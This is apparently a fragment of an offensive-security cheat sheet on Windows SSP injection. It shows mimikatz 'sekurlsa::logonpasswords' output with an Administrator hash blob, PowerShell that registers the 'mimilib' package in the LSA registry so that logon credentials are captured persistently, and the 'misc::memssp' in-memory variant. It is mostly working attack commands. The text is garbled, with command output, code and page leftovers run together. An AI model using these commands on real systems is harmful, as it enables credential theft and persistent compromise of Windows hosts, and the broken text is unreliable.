SSP Injection
mimikatz # sekurlsa::logonpasswords
Session : RemoteInteractive from 4
User Name : Administrator
* LSA Isolated Data: NtlmHash
Encrypted : 6ad536994213cea0d0b4ff783b8eeb51e5a156e058a36e9dfa8811396e15555d40546e8e1941cbfc32e8905ff705181214f8ec5c# Retrieve the current list of registered SSPs from the OSConfig registry path
$packages = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\' -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
# Add the custom SSP "mimilib" to the list
$packages += "mimilib"
# Update the OSConfig registry key with the modified list, registering the new SSP
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\' -Name 'Security Packages' -Value $packages
# Update the main LSA registry key to ensure the custom SSP is recognized (some systems use this path)
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\' -Name 'Security Packages' -Value $packagesC:\Windows\System32\mimilsa.logmimikatz # misc::memsspLast updated